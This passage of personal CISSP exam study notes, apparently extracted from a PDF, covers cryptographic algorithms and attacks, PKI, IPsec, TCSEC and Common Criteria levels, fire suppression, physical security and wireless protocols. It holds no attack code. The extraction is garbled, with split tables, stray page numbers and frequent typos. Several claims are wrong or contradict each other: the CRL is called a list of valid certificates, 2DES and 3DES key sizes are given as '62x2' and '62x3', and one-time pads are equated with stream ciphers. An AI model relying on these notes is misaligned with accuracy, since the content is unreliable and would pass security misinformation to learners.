5, 2 Fish, Blow Fish, IDEA, Diffie-Hellman & & SHA-2, HAVAL
 19

CAST, MARS, SKIPJACK, Knapsack, Lucas

Scytale

Diffie-Hellman & Elgamal are using Discrete Algorithm

 Certification Revocation List: List of the valid certificates. Causes Latency - CRA
 Online Certificate status protocol: Just query the certificate online and result would be valid,
invalid or unknown. – OCSP
 CPV – Certificate Path Validation – It means that each certificate in a certificate path from the
original start or root of trust down to the server or client in question is valid and legitimate

Certification Generation Process

 1. Prove your identity to CA

 2. Once verified, provide your public key to CA
 3. CA will make a copy of public key and put in a certificate.
 4. CA will digitally sign the certificate using own private key and give it to you.
 5. You can distribute the certificate to the users.

Circuit Encryption:

 1. Link Encryption: Encrypts everything (Tunnel). Slow but secure. Works on low OSI lay
ers (LE-TUNNEL-SLOW-LOSI)
 2. End to End Encryption: Encrypts on Payload (TLS/Transport). Fast but less se cure.
High on OSI layers.(ETE-TRANS-FAST-HOSI)

IpSec

 Works on Layer 3. Standard Architecture for VPN. (P A I N)

 Setting up secure channel between 2 parties.
 Modes: Tunnelling: Whole Packet is encapsulated (Security) & Transport: Only Payload
is encapsulated (Performance)
 Authentication Header (AH): P A I N. Prevents against replay attack
 Encapsulated Security Payload (ESP): P A I N
 Security Association: Unique Identifier of a secure connection.
 Destination address + secure parameter index
 It has simplex connection ---> 2-way channel needs 2 security association.
 ESP Provides Confidentiality, AH provides authentication and integrity
 In tunnel model ESP encrypts the entire packet
 In transport mode ESP encrypts only Data
 That’s’ why AH is used with ESP in transport mode (In tunnel mode IP address and
headers are already encrypted)(AH+ESP+TRANS)
 ISAKMP: Internet Security Association Key Management Protocol
o a. Authenticate
o b. Create and Manage SA
o c. Provide key generation mechanism
o d. Protect against threat
 Oakley: Used for key management (uses Diffie Hellman)
 20

Cryptographic Attacks

 1. Analytic: Algebraic weakness

 2. Implementation: Exploits the weakness in implementation.
 3. Statistical Attack: Statistical weakness (generating randomness)
 4. Brute Force (Only Cipher text is known)
 5. Frequency Analysis: ROT3 – Polyalphabetic Cipher is used to defeat Frequnecy
Analysis
 6. Cipher text Only: Cipher text is known – RSA Attack – Brute Force- Frequency Analysis
 7. Known Plain text: Cipher text + Plain Text is known – DES, 3DES – Meet in Middle
 8. Chosen Cipher text: Key is discovered. Decrypts the chosen cipher text. (Reveal the
Secret Key)
 9. Chosen Plain text: Encrypts the plain text to see the output
 10. Meet in the middle attack: Attack has known plain text. DES, 3DES
 11. Man in the middle attack
 12. Birthday (Collision attack): Hashing – When two plaintext messages generate the
same hash
 13. Replay: Keep the intercepted message and replay later.

Applied Cryptography

 MS Windows – Bitlocker, & EFS Encrypting File System Technology

 MAC – File Vault Encryption
 Open Source – Veracrypt
1) TCSEC- DoD, Ranibow, Orange Book, VMDM
 Trusted Computer System Evaluation Criteria (TCSEC): Created by DoD.
 Protects Confidentiality. (Rainbow series)
 Level Requirement
 D Minimum Protection
 C1 Discretionary Protection (DAC)
 C2 Controlled Access Protection (Media cleansing for reusability)
 B1 Labelled Security (Labelling of data)
 B2 Structured Domain (Addresses Covert channel)
 B3 Security Domain (Isolation)
 A Verified Protection (B3 + Dev Cycle)

2) ITSEC
 Information Technology Security Evaluation Criteria. (ITSEC): Security Evaluation Criteria
for Europe. Developed as an alternative to TCSEC. It protects CIA.
 21

TCSEC Security Divisions: (VMDM)-(ABCD)

A. Verified Protection – a3
B. Mandatory Protection – B3-Security Domains, B2-Structured Protection, B1-
Labeled Security,
C. Discretionary Protection – C2 – Controlled Access, C1 – Discretionary Security
D. Minimal Protection – D1 – Minimal Protection
3) CC
 ISO: 15408 - Globally accepted evaluation criteria. Based on following key elements to test
Target of Evaluation (TOE) {The product for evaluation}
 a. Profile Protection: What customer needs
 b. Security Targets: Vendor’s claim of the security in the system.
 Level Assurance Level – FSMMSSF(T,T,TC,DTR,DT,DVT,DVT)
 EAL1 Functionally Tested
 EAL2 Structurally Tested
 EAL3 Methodically tested and checked
 EAL4 Methodically designed, tested and reviewed
 EAL5 Semi-formally designed and tested
 EAL6 Semi-formally designed, verified and tested
 EAL7 Formally designed, verified and tested
CPU Processing Modes
 Multi-processing: CPU harnesses more than one processor. (Dual Core, Octa Core)
o a. Symmetric Multiprocessing (SMP): All processor has single OS
o b. Massively Parallel Processor (MPP): All processors has their own OS
 Multi-Threading: Multiple tasks to be performed within single processor
1. Covert Channels: Communication over unauthorized channel. Opposite is known as Overt Channel
(communication through authorized channel)
o a. Covert Timing Channel: Modify resource timing (Difficult to detect)
o b. Covert storage channel: writing data to a common storage for other process to
read it.

Static Voltage Vs Damage

 40 Destroy Circuits
 1000 Scrambling monitor display
 1500 Destroy stored data
 2000 System shut down
 4000 Printer jam
 17000 Permanent circuit damage

Temperature Vs Damage

 100°F Storage Tapes

 175°F Hardware (RAM, CPU)
 350°F Paper products

Fire prevention, Detection Four stages of Fire: Fire Extinguisher -- C L E M

and Suppression
1. Water ----(Suppress)---->
Temperature
2. Soda Acid, Dry Powder ----
(Suppress)----> Fuel Supply
3. CO2 ----(Suppress)---->
Oxygen
1. Incipient: Air ionization but
no smoke
2. Smoke: Smoke visible
3. Flame stage: Flame Visible
(Tip to remember)
A Common Combustible Water,
soda acid
B Liquid CO2, Halon, Soda acid
C Electrical CO2, Halon (FM-
200)
 22

4. Halon ----(Stops)----> 4. Heat: Intense Heat visible D Metal Dry Powder

Chemical Reaction

FE=13 is safest file suppression system in electrical environment

Water Suppression System:

 1. Wet Pipe (closed headed): Always filled with water

 2. Dry Pipe: Contains compressed air
 3. Deluge: Dry pipe with large pipes which deliver huge volume of water. (not suitable for
environments with computer or electronic items)
 4. Preaction: Combination of dry and wet pipe. Most suitable for computer rooms with
humans

Motion Detectors:

 1. Infrared --> changes in infrared light pattern (Passive Infrared Motion – Body Energy)
 2. Heat Based --> changes in heat level
 3. Wave Pattern --> changes in the ultra-sonic or high microwave signal
 4. Capacitance --> changes in the electric or magnetic field
 5. Photoelectric --> changes in the visible light – Smoke Detector
 6. Passive audio motion --> Listens abnormal sound
 7. Flame Sensor - Fire

IMP Points:

 Security plan is developed through a critical path analysis, Critical Path analysis is a systematic
effort to identify relationships between mission critical applications, processes and operations,
processes and operations and all the necessary supporting elements
 IOT Security – Deploy a distinct network for the IOT equipment which is kept separate and
isolated from the primary network (Three Dumb Routers)
 CASB – It is a security policy enforcement solution that may be installed on-premise or it may
be cloud based
 Government standards for certification and accreditation
o RMF – Risk Management Framework
o CNSSP – Committee of National Security Systems Policy
o Both are divided into four phases – Definition, Verification, Validation & Post
Accreditation
 SCIF – Sensitive Compartmented Information Facility – It is often used by government & military
contractors to provide a secure environment for highly sensitive data storage & computations
 Which of the following are acceptable components of NIST’s Digital Signature Standard (DSS)? -
Asymmetric algorithm DSA, RSA, or ECDSA, and SHA for hashing
 Confinement: Process confinement allows a process to read from and write to only certain
memory locations and resources also called sandboxing
 23

 In cryptography, the avalanche effect is the desirable property of cryptographic algorithms,

typically block ciphers and cryptographic hash functions, wherein if an input is changed slightly,
the output changes significantly.
 The key variable is another term for a key. A keyspace is all of the possible values that can be
used during key generation, and an initialization vector is a value used with a key in stream
algorithms.
 A transponder is a type of physical access control device that does not require the user to slide
a card through a reader. The reader and card communicate directly.
 Smoke-activated detectors use photoelectric optical detectors to detect changes in light
intensity
 Digital signatures are created by using a hashing algorithm to create a message digest & then a
private key is used to encrypt the message digest.
 Elliptic Curve Cryptosystem (ECC) first surfaced in the 1980s and is replacing modular math
with the algebraic functionality of elliptical curves. It is extremely efficient due to very small
key sizes and provides three primary services (digital signing, secret key distribution, and data
encryption).
 The Diffie-Hellman algorithm was developed in 1976 as the first method for electronic key
distribution. It was the first public key algorithm created, and allowed for a symmetric key to
be exchanged securely without a prior relationship being set up.
 CPTED provides three main strategies : natural access control, natural surveillance, and natural
territorial reinforcement
 Pretty Good Privacy (PGP) is a freeware e-mail security program developed by Phil Zimmerman
in 1991. It does not use a hierarchical trust model, as in PKI, but a web of trust. This means
individual users determine to what degree they trust each other.
 Common-mode noise is electrical noise between the hot and ground wire and between the
neutral and ground wire.
 When developing a security program, the follow steps should take place in this order;(Team,
Risk Analysis, Acceptabale Risk Level, Baseline, Counermeasure)
 Identify a team of internal employees and/or external consultants who will build the
physical security program through the following steps.
 Carry out a risk analysis to identify the vulnerabilities and threats and to calculate the
business impact of each threat.
 Work with management to define an acceptable risk level for the physical security
program.
 Derive the required performance baselines from the acceptable risk level.
 Create countermeasure performance metrics.
 Differential, linear, and algebraic cryptanalysis are attacks towards symmetric block ciphers. A
rubber hose cryptanalysis is a non-technical attack consisting of assault and battery, when
someone is physically threatened and possibly tortured so that they will hand over a key
 Side channel attacks are carried out by monitoring how something works and then reverse
engineering the item by using deductive logical to understand how it works. Power, timing,
emissions, and radiation are the common items that are monitored. This is a passive attack.
 RSA can be used for data encryption, key exchange, and digital signatures. DSA can only be
used for digital signatures.

 Message A was encrypted with key A and the result is ciphertext Y. If that same Message A was
encrypted with key B the result should not be ciphertext Y. The ciphertext should be different
since a different key was used. But if this does take place it is referred to as key clustering.
 A physical security program needs to be made up of controls that map to the following
categories; • Deterrence • Delaying • Detection • Assessment • Response
 The proper lighting is to have lights that provide 2 foot candle power, meaning 2 foot in
illumination, and 8 feet in height.
 scytale was one of the earliest forms of cryptography. It is an example of symmetric
cryptography because the sender and receiver need to have the same size staff so when the
paper is wrapped about the staff the letters properly match up
 Concealment ciphers disguise messages within the text or body of a message, such as using
every other word in a sentence to form a different message. Steganography hides messages
within the slack bits of pictures, music files, etc.
 24

 Key-overriding can be used during emergency situations or with authorized personnel to gain
immediate access. Master keying has to do with the capability of reconfiguring the lock, as in
resetting the access code.
 The memory manager has five basic responsibilities (R, P,S, LO,PO)
o Relocation • Swap contents from RAM to the hard drive as needed • Provide
pointers for applications if their instructions and memory segment have been
moved to a different location in main memory
o Protection • Limit processes to interact only with the memory segments assigned to
them • Provide access control to memory segments
o Sharing • Use complex controls to ensure integrity and confidentiality when
processes need to use the same shared memory segments • Allow many users with
different levels of access to interact with the same application running in one
memory segment
o Logical organization • Allow for the sharing of specific software modules, such as
dynamic link library (DLL) procedures
o Physical organization • Segment the physical memory space for application and
operating system processes
 The HAVAL algorithm is a single purpose algorithm that performs one-way hashing functionality
 The Digital Signature Standard approves three encryption algorithms for use in digital
signatures: the Digital Signature Algorithm (DSA); the Rivest, Shamir, Adleman (RSA) algorithm;
and the Elliptic Curve DSA (ECDSA) algorithm
 The verification process is similar to the certification process in that it validates security
controls. Verification may go a step further by involving a third-party testing service and
compiling results that may be trusted by many different organizations. Accreditation is the act
of management formally accepting an evaluating system, not evaluating the system itself.
 In TLS, both the server and the client first communicate using an ephemeral symmetric session
key. They exchange this key using asymmetric cryptography, but all encrypted content is
protected using symmetric cryptography
 The certificate revocation list contains the serial numbers of digital certificates issued by a
certificate authority that have later been revoked
 Mirai targeted “Internet of Things” devices, including routers, cameras, and DVRs
 Cooperative multitasking means that a developer of an application has to properly code his
software to release system resources when the application is finished using them, or the other
software running on the system could be negatively affected. In a preemptive multitasking
environment, the operating system would have more control of system resource allocation and
provide more protection for these types of situations.
 When a heavy electrical device is turned on, it can draw a large amount of current, which is
referred to as in-rush current
 Key Derivation Functions (KDFs)? A. Keys are generated from a master key
 A. Stream ciphers were developed to provide the same type of protection one-time pads do,
which is why they work in such a similar manner. In practice, however, stream ciphers cannot
provide the level of protection one-time pads do, but because stream ciphers are implemented
through software and automated means, they are much more practical (Rail/Fence Cipher)
 SSL Connection Setup Process - The client creates a session key and encrypts it with a public
key.
 TPM - Binding a hard disk drive is when the decryption key that can be used to decrypt data on
the drive is stored on the TPM. Sealing is when data pertaining to the system’s state is hashed
and stored on the TPM
 MAC Vs HMAC - MACs are a result of hashing a message, whereas HMACs are a result of hashing
both the message and a shared secret key
 RSA is based on a one-way function that factors large numbers into prime numbers
 RSA is an asymmetric algorithm developed by Rivest, Shamir, and Adleman and is the de facto
standard for digital signatures.
 Elliptic curve cryptosystems (ECCs) are used as asymmetric algorithms and can provide digital
signature, secure key distribution, and encryption functionality. They use fewer resources,
which makes them better for wireless device and cell phone encryption use.
 Simple Authentication and Security Layer (SASL) is a framework for authentication and data
security in Internet protocols. It decouples authentication mechanisms from application
 25

protocols, in theory allowing any authentication mechanism supported by SASL to be used in

any application protocol that uses SASL.
 Fences are one of the first lines of defences and, as such, should be of the right design to
protect the physical facility.
o A 3/8-inch mesh, 11-gauge wire is the specification for an extremely high-security
fence.
o 2-inch mesh, 9 gauge specifies a normal fence design.
o 1-inch mesh, 9 gauge specifies a very high-security fence design,
o 2-inch mesh, 6 gauge specifies a more secure-than-normal fence design.
 A fire needs high temperatures, oxygen, and fuel. To suppress it, one or more of those items
needs to be reduced or eliminated.
 Gases like FM-200 and other halon substitutes interfere with the chemical reaction of a fire.
 Process isolation is a logical control that attempts to prevent one process from interfering with
another.
 Hardware segmentation takes process isolation one step further by mapping processes to
specific memory locations. This provides more security than logical process isolation alone.
 A Type 1 hypervisor, also called bare metal, is part of an operating system that runs directly on
host hardware. A Type 2 hypervisor runs as an application on a normal operating system, such
as Windows 10.
 The risk of virtualization escape is called VMEscape, where an attacker exploits the host OS or a
guest from another guest.
 Java applets run in a sandbox, which segregates the code from the operating system. The
sandbox is designed to prevent an attacker who is able to compromise a java applet from
accessing system files, such as the password file.
 ActiveX controls are the functional equivalent of Java applets. They use digital certificates
instead of a sandbox to provide security. Unlike Java, ActiveX is a Microsoft technology that
works on Microsoft Windows operating systems only.

Symmetric:

 Symmetric encryption may have stream and block modes. Stream mode means each bit is
independently encrypted in a “stream.” Block mode ciphers encrypt blocks of data each round;
 Some symmetric ciphers use an initialization vector to ensure that the first encrypted block of
data is random. This ensures that identical plaintexts encrypt to different ciphertexts.
 Chaining (called feedback in stream modes) seeds the previous encrypted block into the next
block ready for encryption.
 Rijndael was chosen and became AES. AES has four functions: SubBytes, ShiftRows, MixColumns,
and AddRoundKey.
 Methods of Key Distribution – Offline Distribution, Public Key Encryption, Diffie-Hellman
 Secret key, session key, shared key are other names of Symmetric key cryptography
 DES Developed by IBM, key size 64 bit, effective key size is 56 bit ( 8 bit parity value) block size
is also 64. DES performs 16 round of operations ( XOR)
 2DES multiply - key size ( 62x2), effective key size ( 56x2) and round of operations ( 16x2) -
The Primary complaint about DES was that the key was too short, one of the alternatives to
create stronger version of DES was to double the encryption process. 2 DES is vulnerable for
Meet-in-the-Middle Attack ( MITM)
 3DES triple -key size ( 62x3), effective key size ( 56x3) and round of operations ( 16x3)
 Remember for the exam SSL (DES) TLS (AES)
 CCMP is an encryption protocol that forms part of the 802.11i standard for wireless local area
networks.
 Blowfish: Extremely fast cipher, with limited memory you can process the data.
 RC4 used in SSL & WEP
 AES used in WPA

Overall – CIA
 26

1. Encryption – Confidentiality
2. Hashing – Integrity
3. Digital Signature – Authentication, Integrity & Non Repudiation
4. Encryption + Digital Signature – Confidentiality, Authentication, Integrity & Non Repudiation

Asymmetric:
 When a message is encrypted with one half of the a key it must be decrypted with the other
half of the key.
 Encryption with public key provides confidentiality
 Encryption with sender's private key provides proof of origin - authenticity with timestamp
provides non repudiation.
 A Digital signature is created by signing a hash with a private key - it binds the document to a
person non repudiation
 A certificate binds a public key to an entity
 Diffie–Hellman key exchange (DH)[nb 1] is a method of securely exchanging cryptographic keys
over a public channel and was one of the first public-key protocols as originally conceptualized
by Ralph Merkle and named after Whitfield Diffie and Martin Hellman.[1][2] DH is one of the
earliest practical examples of public key exchange implemented within the field of
cryptography.
 RSA is based on the mathematical challenge of factoring the product of two large prime
numbers, the Primary attack approaches - Brute force - Mathematical attacks - Timing attacks -
Factoring attack
 El Gamel - Extension of Diffie-Hellman included the ability to provide message confidentiality
and digital signatures services, based on the the same mathematical functions of discrete logs.
 Elliptic Curve Cryptography ( ECC) - Have the highest strength per bit of key length of any of
the asymmetric algorithms, The ability to use much sorter ksyes for the ECC implementations
provides savings on computational power and bandwidth.
 Session Key – Secret Symmetric key use to encrypt message, shortest time frame of key is session
key used in SSL
 Factoring is the basis of the RSA algorithm.
 This one-way function is the basis of the Diffie-Hellman and ElGamal asymmetric algorithms.
 ECC leverages a one-way function that uses discrete logarithms as applied to elliptic curves.
Solving this problem is harder than solving discrete logarithms, so algorithms based on elliptic
curve cryptography (ECC) are much stronger per bit than systems using discrete logarithms (and
also stronger than factoring prime numbers). ECC requires less computational resources
because it uses shorter keys comparison to other asymmetric methods. Lower-power devices
often use ECC for this reason.

 MAC & HMAC

o Message authentication code (MAC), sometimes known as a tag, is a short piece of
information used to authenticate a message—in other words, to confirm that the
message came from the stated sender. (its authenticity) and has not been changed.
The MAC value protects both a message's data integrity as well as its authenticity,
by allowing verifiers (who also possess the secret key) to detect any changes to the
message content. Hash-based message authentication code, or HMAC, is an
important building block for proving that data transmitted between the
components of a system has not been tampered with.

 PKI
 PKI concept is introduced to address the challenges in Symmetric and Asymmetric keys by
having Trusted Third party ( CA - Certificate authority) - CA holds all the certificates.
 X.509 defines a common set of information and required attributes to create a PKI
certificate, also defines the requirement for a Certificate Signing Request ( CSR) to be used
for a CA to create a PKI Certificate.
 Certificate Authority (CA) “signs” an entities digital certificate to certify that the
certificate content accurately represents the certificate owner.
 CA should be in LAN & OSCP in DMZ
 27

 SET ( Secure Electronic Transaction ) - alternative to SSL

 - Developed by VISA and Mastercard to allow for more secure monetary transactions over
internet.
 - Cryptographic protocol that encrypts and sends credit card numbers over internet
 - Uses public key cryptography
 - Was developed to replace SSL, but it is slow in acceptance
 - Confidentiality through DES, Digital signatures using RSA

 Key Wrapping and Key Encrypting Keys ( KEK)

 One key is encrypted using another key , KEK are used as part of key distribution or key
exchange, the process of using a KEK to protect session keys is called key wrapping, key
wrapping uses symmetric ciphers to securely encrypt a plain text key with associated integrity
information and data.

 Differential cryptanalysis seeks to find the difference between related plaintexts that are
encrypted. The plaintexts may differ by a few bits.
 Linear cryptanalysis is a known plaintext attack where the cryptanalyst finds large amounts of
plaintext/ ciphertext pairs created with the same key. The pairs are studied to derive
information about the key used to create them.

 Here are the four classes of gates: • Class I: Residential (home use) • Class II: Commercial/
General Access (parking garage) • Class III: Industrial/ Limited Access (loading dock for 18-
wheeler trucks) • Class IV: Restricted Access (airport or prison)

 Pretty Good Privacy (PGP), created by Phil Zimmerman in 1991, brought asymmetric encryption
to the masses. PGP provides the modern suite of cryptography: confidentiality, integrity,
authentication, and nonrepudiation. PGP can encrypt emails, documents, or an entire disk
drive. PGP uses a web of trust model to authenticate digital certificates, instead of relying on a
central CA.
 Secure MIME (S/ MIME) leverages PKI to encrypt and authenticate MIME-encoded email. The
client or client's email server, called an S/ MIME gateway, may perform the encryption.

 Smart cards may be “contact” or “contactless.” Contact cards use a smart card reader, while
contactless cards are read wirelessly. One type of contactless card technology is radio-
frequency identification (RFID). These cards contain RFID tags (also called transponders) that
are read by RFID transceivers.

 Contraband checks seek to identify objects that prohibited from entering a secure area. These
checks often detect metals, weapons, or explosives. Contraband checks are casually thought to
be detective controls, but their presence makes them a viable deterrent to actual threats.

 Heat detectors emit alerts when temperature exceeds an established safe baseline.
 Smoke detectors work through two primary methods: ionization and photoelectric.
 Flame detectors detect infrared or ultraviolet light emitted in fire.

 Recommended replacements for Halon include the following systems: • Argon • FE-13 • FM-200
• Inergen FE-13 is the newest of these agents, and comparatively safe. Breathing it in is safe in
concentrations of up to 30%. Other Halon replacements are usually only safe for breathing up to
a 10– 15% concentration.
 This makes CO2 a dangerous suppressive agent, so it is only recommended for use in unstaffed
areas, such as electrical substations.

Key Escrow Approaches

 Fair Cryptosystems – Secret keys used in communication are divided into two major pieces
 28

 Escrowed Encryption Standard – Provides the Government with a technological means to

decrypt the ciphertext

 The operating system prohibits direct access to absolute memory. Applications each operate
within their own memory spaces and make use of calls to relative memory (back a few, forward
a few using offsets) or logical memory (using indexes or variable names).
 A cold start must be performed when a system suffers a total TCB or media failure and the
system must be restored to a reliable, secure state. A system restart typically occurs when an
application or process cannot be terminated or the system enters an unstable state.
 Van Eck phreaking is a form of eavesdropping. It was developed on the theory that the contents
of a CRT display could be sniffed and decoded by intercepting the monitor’s electromagnetic
emissions. TEMPEST is one technology that was created to prevent Van Eck phreaking. Van Eck
phreaking has nothing to do with analog or digital phone systems and is not a coding attack.
 EDO DRAM is faster than DRAM and has a type of look-ahead feature
 Plaintext usernames and passwords are a major security issue with email. Anyone who has
access to the network can potentially sniff this information, thereby breaching
 Digital Certificate will not include – Private Key
 LUC – Asymmetric algorithm and using lucas function

 A computer with little memory but a huge swap space will be the best retrieval of evidence of
a code injection attack during a dead acquisition
 Enticement is legal
 Evidence Life Cycle Sequence – Collection, Analysis, Storage, Presentation and return to Victim
 Incident Response Step – Identify, Coordinate, Mitigate, Investigate, and Educate
 Gutmann provides greatest level of assurance that previously stored data is irretrievable

 One-time PAD is like Vernam Cipher

 Confusion is normally carried out through substitution, and diffusion by transposition
 Vignenere is using Sercret Word to encrypt and decrypt messages
 Skyatle need the same stuff to wound on souce and destination to decrypt the messages
 ECC=Digital Signtaure+Encryption+Secret Key Distribution
 While selecting any new encryption algorithm we need to consider Business Risk, Cost Benefit
Analysis & Regulatory Compliance (Normally Regulatory Compliance should be part of Business
Risk)
 One time pads are same as Stream Cipher
 Triple DES is an extension of DES offers much stronger protection. It can be used as a number of
modes including DES-EDE3 which utilizes three keys and an encrypt/decrypt/encrypt sequence
 MD5 always produce 128 Bt Digest
 RSA = Digital Signature + Encryption, DSA = Digital Signatures
 HAVAL is using Hashing Algorithm
 Lucifier was accepted as DES
 The tranquility principle of the Bell-LaPadula model states that the classification of a subject
or object does not change while it is being referenced. There are two forms to the tranquility
principle:the "principle of strong tranquility" states that security levels do not change during
the normal operation of the system and the "principle of weak tranquility" states that security
levels do not change in a way that violates the rules of a given security policy.

 ECC & RSA --- Key Exchange

 Diffi Helman (Not Confidential) & El Gamal (Confidential) – Key Agreement (Doubles the size of
Data)
 RSA = Brute Force + Mathematical + Timing Attacks
 SSL Vs TLS – SSL (RC4 + MD5), TLS (AES + SHA)
 Quantum Key – Alternative of Asymmetric for Digital Signature
 CRL – Latency Issue, OSCP – Faster
 800-14 & 800-27 – Security Framework for Design & Build Systems
 800-124 – Guidelines for managing Security in Mobile Device
 29

 800-40 R3 – Patch
 800-121 – Guide to Bluetooth Security
 Foot Candles – FC
o Building Entrance – 5 fc
o Parking Garages – 5 fc
o Walkaways – 1.5 fc
o Light use for CCTV – 1.2 fc
o Areas surrounding Building – 1 fc
o Site Landscape – 0.5 fc
o Roadways – 0.5 fc
 NOC – Network Operation Centre – Availability
 SOC – Security Operation Centre – Confidentiality
 2 Man rule in DC
 12 Hour fuel in Generator
 10 Seconds – Generator Should Start
 Cooling Types –
o Latent Cooling – Removal Moisture
o Sensible Cooling – Heat Removal
 DC Should not be in Coastal Region – Corrosion
 Smoke Detector
o Ionization – Fast
o Photo Electric –

 PP-TOE-ST-Assign EAL-Certification
 MDM – Remotely Wipe Data – Finding Geographic Location – Manage Geographic Location
 Forensic Integration always challenges for retrieving the images of Embedded System

 SDLC - Software Development Life cycle - this is for software

 SELC - System Engineering Lifecycle - this is for system engineering i.e for Product
 Verification - is all about weather we met detailed documented requirements
 Validation - weather it met the actual user objectives
 System Engineering Technical Process: Requirement Definition – Requirement Analysis –
Architectural Design – Implementation – Integration – Verification – Validation – Transition (Need
to remember sequence)

 ISO/IEC 21827:2008 - SSE-CMM System Security Engineering - Capability maturity model:

Standard matrix for Security engineering matrix, talks about entire life cycle of the product,
apply to the whole organization, concurrent interactions with other displicplaines, interactions
with other organizations.

 Use the principles in security frameworks such as NIST SP 800-14 or SP 800-27 when you design
and build your systems.

 Exam Question: Fetching -> Decoding -> Executing -> Storing, cycle to repeat until there are no
further instructions to be executed.

 Multitasking: - is the ability of an Operating system to execute more than one task
simultaneously on single processor at a time.
 Multiprocessing - more than one process simultaneously on a multiprocessor machine more than
one CPU at a time. Ex: Grid computing, Here we are using more than one processor.
 Multithreading - ability of an Operating system to execute different part of a program called
thread at the same time.

 Primary responsibility for TCB is confidentiality & integrity. Enforcing security with hardware,
software, firmware and software to build the trust , TCB is concept / service in the OS,
firewall, mobile devices, it basically creates an extra layer of security, enforce centralized
access control/security.
 30

 Security Kernel: The hardware, software, etc that applies the reference monitor.
 Reference Monitor - Enforces (mediate) access controls ensuring people privileges between
objects and subjects.
 Execution Domain: An isolated domain where the TCB can function without external access
from other system processes.
 Security Perimeter: A Conceptual line drawn around trusted and untrusted components trusted,
separate between one domain to another domain.
 Trusted Path: A trusted connection that cannot be compromised , connection should be secure

 Isolation: process isolation is a requirement for multilevel security mode systems, defines the
memory address, execute it in particular location.
 Segmentation: Enforces the requirements via physical hardware controls rather than logical
process isolation controls forced by the OS. Segmentation of the memory.

 The subset of Enterprise architecture is security architecture.

o Enterprise architecture: Ex: TOGAF, Zachman
o Security architecture : SABSA, CISSP-ISSAP,EP,MP

 Cooling - Two types of cooling Latent and Sensible cooling

o Latent cooling - Objective is to remove moisture - Facilities people workspaces
o Sensible cooling - remove the heat use in data center
 Categories of Smoke Detectors
o Ionization – Reacts to charged particles of smoke, Gives early warning
o Thermal Detector – Alarms when there is change in temperature,
o Photoelectric – Alarms when source of the light interrupted
o Infrared Flame – React to emissions of flame

 Types of Alarm system

o Notification - uses silent alerts to notify security guards and law enforcement
o Repellant alarm - Uses audible sirens, bells and lights
o Deterrent alarms - can engagement locks, gates and other barriers to prevent access
when activated.
 Information Systems Security Evaluation Models
 Security Policy - Documents the security requirements ( understand policy) – NIST, ISO, FIPS
 Security model - A Specification that describes the rules to be implemented – Biba, Bella,
State Machine Model
 First understand policy, based on the policy design the security model, select programming
code and product the final product.
 Draft security model - based on the security policy we define security model, based on the
model we define the programming code results in final product.
 TCSEC - Trusted Computer System Evaluation Criteria (TCSEC) is a United States Government
Department of Defense (DoD) standard
 CC - Common Criteria Common Criteria (CC) is an international set of guidelines and
specifications developed for evaluating information security products, specifically to ensure
they meet an agreed-upon security standard for government deployments.

o Common Criteria (CC) is also referred as ISO/IEC 15408 standard was the first truly
international product evaluation criteria.
o The common criteria introduced protection profiles ( PP) - Common set of functional
and assurance requirements for a category of vendor products deployed in a particular
type of environment.
o Common Criteria Lab evaluates different types of ICT products, for each of these
products they have seperate protection profiles.
o The protection profiles has three important element.
 - SPD Security Problem Description - ex: firewall address specific risk
 - SO security objectives - ex: will it meet the objectives / what controls
 - SR security requirements - ex: specific requirements for compliance
 31

 Cryptovariable(key) -variable used in conjunction with an algorithm to encrypt and decrypt

data
 Key space: The range of available key values to be used by an algorithm.
 Null Cipher - remove the values to hide the identity : Null cipher option may be used in cases
where the use of encryption is not necessary but yet the fact that no encryption is needed must
be configured in order for the system to work.
 Running the key cipher: - In a running key cipher, the key is repeated ( or runs) for the same
length as the plain text input.
 One-Time Pads
o Exam Tip - What is Vernam Cipher - OTP
o Which cryptography is impossible to crack - OTP
o Use for sensitive data - OTP
 • Remember that the purpose of encryption is to provide confidentiality, integrity, and
nonrepudiation.
 • Keep in mind that cryptography requires both an algorithm and a key to encrypt something.
 • Choose algorithms that do not permit key clustering.
 • Use block ciphers to encrypt large amounts of data at rest.
 • Use stream ciphers to encrypt real-time data transmissions.
 • Recognize that, as technology and computing power advance, all cryptosystems have a
limited lifespan, and will eventually be replaced by stronger systems.
 • As you study cryptanalytic attacks, you can choose to start your attack with known amounts
of either the plaintext or the ciphertext
 Lock: A lock with a keypad combination is the most vulnerable to shoulder surfing and brute-
force attacks (compare to pin tumblers, dial combination and wards)

Exam tip: Key length is perhaps the most important security parameter. Key length determines the
amount of time taken to break the algorithm. Considering computing powers changes, it is
advisable to keep on changing the key length.

Longer keys provides stronger encryption but not always. Symmetric encryption is stronger per bit
than asymmetric

Heartbleed SSL/ TLS vulnerability - Bounds checking was not implemented, allowing sensitive data
to be obtained by attackers from memory segments on web servers

Operating systems can work within the following architectures: monolithic kernel, layered,
microkernel, or hybrid kernel

Operating systems use absolute (hardware addresses), logical (indexed addresses), and relative
address (indexed addresses, including offsets) memory schemes.

 Heat detectors emit alerts when temperature exceeds an established safe baseline.
 Smoke detectors work through two primary methods: ionization and photoelectric.
 Flame detectors detect infrared or ultraviolet light emitted in fire.

Which of the following is defined as a key establishment protocol based on the Diffie-Hellman
algorithm proposed for IPsec but superseded by IKE?
A. Diffie-Hellman Key Exchange Protocol
B. Internet Security Association and Key Management Protocol (ISAKMP)
C. Simple Key-management for Internet Protocols (SKIP)
D. OAKLEY--------------------------Real Answer
32
 33

Domain 4
 34

Secure Encryption Protocols

WPA = LEAP + TKIP

WPA2 = AES + CCMP

Secure Communication Protocols

EMAIL Security Solutions

 35

SMIME=PKCS, PGP=RSA+IDEA, PEM=RSA+DES

Wireless:

 1. Wired Equivalent Privacy: Provides 64 & 128 bit encryption. – WEP It uses weak 24 bit
Initialization Vector IV
 2. Wi-Fi Protected Access: Uses TKIP which overcomes the weakness of WEP (Uses MIC –
Message Integrity Check to protect against Man in Middle) - WPA
 3. WPA2: Uses AES. Most secure – Uses CCMP

 Routing Protocol Security – RIPv1 does not support md5 authentication for secure route
updates. In case of BGP, OSPF, RIPv2, EIGRP & (IS-IS) all supports MD5

 Callback is more secure then Caller ID

 Which protocol was built to scale well in large networks, support hierarchies, and support the
simultaneous use of multiple paths? – OSPF - Because the Routing Information Protocol (RIP)
could not scale well in large networks, Open Shortest Path First (OSPF) was created. It supports
hierarchies and the simultaneous use of multiple paths. OSPF learns the entire network
topology of the area

 SIP-based signalling suffers from the lack of encrypted call channels and authentication of
control signals.

 Basic Rate Interfaces (BRI) ISDN service provides two bearer, or B channels, and one D or
control channel. PRI ISDN service provides 23 B channels and one D channel.
BRI=2B+1D, PRI=23B+1D

